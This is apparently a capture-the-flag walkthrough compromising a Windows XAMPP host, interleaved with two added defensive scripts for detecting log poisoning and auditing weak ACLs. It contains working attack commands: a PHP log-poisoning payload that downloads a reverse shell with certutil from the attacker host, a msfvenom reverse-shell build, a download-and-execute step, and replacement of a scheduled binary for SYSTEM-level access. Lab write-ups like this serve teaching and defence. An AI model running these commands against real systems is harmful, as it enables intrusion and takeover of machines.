Nmap scan
╰─$ nmap -sV -sC -oA slort 192.168.180.53 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 02:17 EDT
Nmap scan report for 192.168.180.53
Host is up (0.28s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| LDAPSearchReq, NULL, oracle-tns:
|_ Host '192.168.45.236' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.180.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.180.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94%I=7%D=10/8%Time=65224999%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192.168.45.236'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearc
SF:hReq,4D,"I\0\0\x01\xffj\x04Host\x20'192.168.45.236'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-
SF:tns,4D,"I\0\0\x01\xffj\x04Host\x20'192.168.45.236'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-08T06:18:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.20 seconds
craig Davidson
Jane Simpson
Richard Wilson
We enumerate the site with ffuf.
Browsing http://192.168.180.53:8080/site/ turns up nothing of interest, but requesting http://192.168.180.53:8080/site/index.php?page=xxx returns:
Warning: include(xxx): failed to open stream: No such file or directory in C:\xampp\htdocs\site\index.php on line 4
Warning: include(): Failed opening 'xxx' for inclusion (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\site\index.php on line 4
The page parameter is passed to include(), so we request a file whose contents we know, C:\Windows\win.ini, and get it back: http://192.168.180.53:8080/site/index.php?page=C:\Windows\win.ini
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
which confirms a local file inclusion (LFI): an absolute path is included with no restriction at all.
Next we include the Apache access log, which XAMPP keeps at C:\xampp\apache\logs\access.log. It is readable, and it still holds requests from 2020 that tried to include a remote URL through the same parameter: http://192.168.180.53:8080/site/index.php?page=C:\xampp\apache\logs\access.log
192.168.118.6 - - [23/Jun/2020:19:47:53 -0700] "GET /site/index.php?page=http://192.168.118.6/pwn1.php HTTP/1.1" 200 98 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
192.168.118.6 - - [23/Jun/2020:19:48:15 -0700] "GET /site/index.php?page=http://192.168.118.6/pwn2.php HTTP/1.1" 200 138 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
192.168.45.236 - - [08/Oct/2023:01:22:44 -0700] "GET /site HTTP/1.1" 400 325 "-" "-"
192.168.45.236 - - [08/Oct/2023:01:22:55 -0700] "GET /site/index.php?page=C:\\xamp
Now for log poisoning. With curl we send a PHP payload in the User-Agent header; Apache writes the header verbatim into access.log, and the next include() of that file executes it. This first payload uses certutil to download our reverse shell executable from the attacking host:
╰─$ curl -H "User-Agent: <?php system('certutil.exe -urlcache -split -f "http://192.168.45.236/shell1.exe" shell1.exe'); ?>" http://192.168.180.53:8080/site
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.180.53:8080/site/">here</a>.</p>
<hr>
<address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Server at 192.168.180.53 Port 8080</address>
</body></html>
Then we include the log again. The stored payload executes and certutil fetches the binary; its output lands in the page where the User-Agent used to be: http://192.168.180.53:8080/site/index.php?page=C:\xampp\apache\logs\access.log
Firefox/115.0" 192.168.45.236 - - [08/Oct/2023:02:54:21 -0700] "GET /site HTTP/1.1" 301 346 "-" "**** Online **** CertUtil: -URLCache command completed successfully.
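At this point access.log contains executable PHP, which is exactly what a defender should be hunting for in web server logs. The script below is an added example, not part of this writeup: it parses Apache combined-format lines, including the \" escaping Apache applies to quotes inside headers (the certutil payload above contains quotes, so a naive [^"]* field pattern would fail on it), and flags PHP tags or LOLBin names in any field, remote URLs in the page parameter (RFI) and local paths or wrappers in it (LFI). The sample entries are constructed from the requests shown above; the poisoned line is reconstructed as Apache would record it, not copied from the page.

```python
"""Flag LFI / RFI / log-poisoning activity in Apache access logs.

Added example (not from the writeup).  Sample log lines are constructed.
"""
import re
import sys

# Combined log format.  A quoted field may contain \" (Apache escapes quotes
# found in headers), so a field is (?:[^"\\]|\\.)* rather than [^"]*.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) ' + QUOTED + r' ' + QUOTED + r'$'
)

# PHP code in any header or in the request line: attempted log poisoning.
PHP_CODE_RE = re.compile(r'<\?(?:php\b|=)|\b(?:system|passthru|shell_exec|exec|eval|assert)\s*\(', re.I)
# Traversal, absolute paths, /etc or /proc reads and PHP wrappers in the request.
LFI_RE = re.compile(r'(?:\.\./|\.\.\\|%2e%2e|[a-z]:\\|/etc/|/proc/self/|\bphp://|\bdata:|\bexpect://)', re.I)
# A parameter pointing at a remote URL: remote file inclusion attempt.
RFI_RE = re.compile(r'=\s*(?:https?|ftp)://', re.I)
# Living-off-the-land downloaders commonly used inside the poisoned payload.
LOLBIN_RE = re.compile(r'\b(?:certutil|powershell|bitsadmin|mshta|rundll32)\b', re.I)


def parse(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ip, ts, req, status, size, ref, ua = m.groups()
    return {"ip": ip, "ts": ts, "request": req, "status": int(status),
            "size": size, "referer": ref, "ua": ua}


def classify(entry):
    """Return the list of reasons an entry is suspicious (empty if benign)."""
    reasons = []
    for field in ("request", "referer", "ua"):
        if PHP_CODE_RE.search(entry[field]):
            reasons.append(f"php-code-in-{field}")
        if LOLBIN_RE.search(entry[field]):
            reasons.append(f"lolbin-in-{field}")
    if RFI_RE.search(entry["request"]):
        reasons.append("rfi-url-in-request")
    elif LFI_RE.search(entry["request"]):
        reasons.append("lfi-path-in-request")
    return reasons


def scan_log(lines):
    """Run classify() over an iterable of log lines; return the findings."""
    findings = []
    for n, line in enumerate(lines, 1):
        entry = parse(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"line": n, "ip": entry["ip"], "ts": entry["ts"], "reasons": reasons})
    return findings


# Constructed sample: line 1 is the 2020 RFI attempt seen on the page, line 2 is
# benign, line 3 is the include of the log itself (Apache doubles backslashes),
# line 4 is the poisoned User-Agent as Apache would record it (inner quotes as \").
SAMPLE_LOG = [
    '192.168.118.6 - - [23/Jun/2020:19:47:53 -0700] "GET /site/index.php?page=http://192.168.118.6/pwn1.php HTTP/1.1" 200 98 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"',
    '192.168.45.10 - - [08/Oct/2023:01:20:01 -0700] "GET /site/ HTTP/1.1" 200 1034 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"',
    '192.168.45.236 - - [08/Oct/2023:01:22:55 -0700] "GET /site/index.php?page=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP/1.1" 200 4112 "-" "curl/8.3.0"',
    '192.168.45.236 - - [08/Oct/2023:02:54:21 -0700] "GET /site HTTP/1.1" 301 346 "-" "<?php system(\'certutil.exe -urlcache -split -f \\"http://192.168.45.236/shell1.exe\\" shell1.exe\'); ?>"',
]

if __name__ == "__main__":
    # usage: python lfi_log_scan.py access.log   (no argument: scan the sample)
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan_log(lines):
        print(f"line {f['line']}: {f['ip']} {f['ts']} {', '.join(f['reasons'])}")
```

Run against the real C:\xampp\apache\logs\access.log the same scan would surface every request shown in this writeup, since each one carries a traversal path, a PHP tag or a certutil invocation in a field Apache faithfully logs.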
We then poison the log a second time with a payload that runs the binary (the name passed to system() has to be the file certutil saved; the page downloads shell1.exe but runs shell.exe, which the timestamps in the later C:\Backup listing suggest was left over from an earlier attempt):
╭─kali@kali ~/PG/slort
╰─$ curl -H "User-Agent: <?php system('shell.exe'); ?>" http://192.168.180.53:8080/site
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.180.53:8080/site/">here</a>.</p>
<hr>
<address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Server at 192.168.180.53 Port 8080</address>
</body></html>
╭─kali@kali ~/PG/slort
╰─$
With a listener waiting on port 4443 we include the log once more; the new payload executes shell.exe and we get a shell:
╭─kali@kali ~/PG/slort
╰─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.53] 51313
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
whoami
slort\rupert
C:\xampp\htdocs\site>
Privilege escalation. Looking around the filesystem we find a C:\Backup folder:
PS C:\> cd Backup
cd Backup
PS C:\Backup> dir
dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
Reading info.txt:
PS C:\Backup> type info.txt
type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
PS C:\Backup>
So TFTP.EXE is executed every five minutes by some scheduled job. A backup job like this is likely to run as SYSTEM or Administrator, and if our user can write to C:\Backup we can swap the binary for a reverse shell of the same name. Both points are worth confirming from the shell before waiting on the timer: schtasks /query /fo LIST /v | findstr /i tftp shows the task and the account it runs as (if it is visible to our user), and icacls C:\Backup C:\Backup\TFTP.EXE shows whether slort\rupert or BUILTIN\Users holds write or modify rights on the directory or the file. Here the directory is writable: we rename the original TFTP.EXE to TFTPBACK.EXE (it appears under that name in the listing below, so it can be restored afterwards) and drop our shell in as TFTP.EXE.
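The permission check above, done systematically. This is an added example, not from the writeup: it parses the output of icacls for the job's binary and for its parent directory and reports any access control entry that would let a low-privileged principal (or the current user, passed in) modify the file or replace it by renaming it away and creating a new one, which needs only create/delete rights on the directory regardless of the file's own ACL. The icacls output embedded here is constructed to resemble C:\Backup with Users inheriting Modify, plus a hardened variant; the real ACLs on the box are not shown on the page. Run on the target with a path argument, it calls icacls itself.

```python
"""Can a low-privileged user replace a binary that a privileged job executes?

Added example (not from the writeup).  Parses `icacls` output; the samples are
constructed.  Usage on the target: python acl_audit.py C:\Backup\TFTP.EXE
"""
import re
import subprocess
import sys

# Principals every interactive user effectively holds.  The current account
# (e.g. slort\rupert) is added through the `user` argument.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive", "users"}
# Rights that change the file's content, owner or DACL, or delete it.
FILE_WRITE = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D", "DE"}
# Rights on the parent that allow creating a new file or deleting children:
# enough to rename the original away and drop a replacement.
DIR_WRITE = {"F", "M", "W", "WD", "AD", "DC"}
INHERIT = {"I", "OI", "CI", "IO", "NP"}          # inheritance flags, not rights
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path, text):
    """Return [(principal, {rights})] from `icacls <path>` output.  The first
    line carries the path in front of the first ACE; it is stripped by length
    so paths containing spaces are handled."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("rights"))
        rights = {t for grp in tokens for t in grp.split(",") if t} - INHERIT
        aces.append((m.group("who"), rights))
    return aces


def weak_aces(path, text, dangerous, user=None):
    """ACEs granting any of `dangerous` to a low-privileged principal."""
    principals = set(LOW_PRIV)
    if user:
        principals.add(user.lower())
    return [(who, sorted(rights & dangerous))
            for who, rights in parse_icacls(path, text)
            if who.lower() in principals and rights & dangerous]


def audit(binary, file_acl, dir_acl, user=None):
    """Weak ACEs on the binary and on its directory; both empty means the job
    cannot be hijacked this way."""
    parent = binary.rsplit("\\", 1)[0]
    return {"file": weak_aces(binary, file_acl, FILE_WRITE, user),
            "dir": weak_aces(parent, dir_acl, DIR_WRITE, user)}


# Constructed icacls output modelled on C:\Backup, Users inheriting Modify.
WEAK_FILE = r"""C:\Backup\TFTP.EXE NT AUTHORITY\SYSTEM:(I)(F)
                   BUILTIN\Administrators:(I)(F)
                   BUILTIN\Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""
WEAK_DIR = r"""C:\Backup NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
          BUILTIN\Administrators:(I)(OI)(CI)(F)
          BUILTIN\Users:(I)(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""
# Constructed hardened variant: Users may only read and execute.
SAFE_FILE = WEAK_FILE.replace("Users:(I)(M)", "Users:(I)(RX)")
SAFE_DIR = WEAK_DIR.replace("Users:(I)(OI)(CI)(M)", "Users:(I)(OI)(CI)(RX)")


def run_icacls(path):
    """Call icacls on the target (Windows only) and return its stdout."""
    return subprocess.run(["icacls", path], capture_output=True, text=True).stdout


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        parent = target.rsplit("\\", 1)[0]
        print(audit(target, run_icacls(target), run_icacls(parent), user=sys.argv[2] if len(sys.argv) > 2 else None))
    else:
        print("sample:", audit(r"C:\Backup\TFTP.EXE", WEAK_FILE, WEAK_DIR))
```

The fix on the defending side follows directly from the output: the job's binary and its directory should grant write, modify or delete rights only to the account that maintains the job, and a scheduled task should never execute from a directory that ordinary users can write to.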
Create the new shell binary, calling back to port 8080:
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8080 -f exe > shell2.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
╭─kali@kali ~/PG/slort
╰─$
Serve it over HTTP from the attacking host and download it into C:\Backup on the target:
PS C:\Backup> Invoke-WebRequest -Uri http://192.168.45.236:80/shell2.exe -OutFile C:\Backup\shell2.exe
Invoke-WebRequest -Uri http://192.168.45.236:80/shell2.exe -OutFile C:\Backup\shell2.exe
PS C:\Backup> dir
dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 10/8/2023 1:40 AM 73802 shell.exe
-a---- 10/8/2023 3:37 AM 73802 shell2.exe
-a---- 6/23/2020 7:49 PM 73802 TFTPBACK.EXE
PS C:\Backup> mv shell2.exe TFTP.EXE
mv shell2.exe TFTP.EXE
PS C:\Backup>
Start a listener on port 8080 and wait for the next five-minute run.
After a few minutes the job executes our binary and we get a shell as Administrator:
listening on [any] 8080 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.53] 51436
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administrator
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\
10/08/2023 03:38 AM <DIR> Backup
12/07/2019 02:14 AM <DIR> PerfLogs
05/04/2022 01:06 AM <DIR> Program Files
12/03/2021 09:22 AM <DIR> Program Files (x86)
12/03/2021 09:29 AM <DIR> Users
05/04/2022 01:52 AM <DIR> Windows
06/12/2020 08:11 AM <DIR> xampp
0 File(s) 0 bytes
7 Dir(s) 28,620,115,968 bytes free
C:\>cd Users
cd Users
C:\Users>cd Administrator
cd Administrator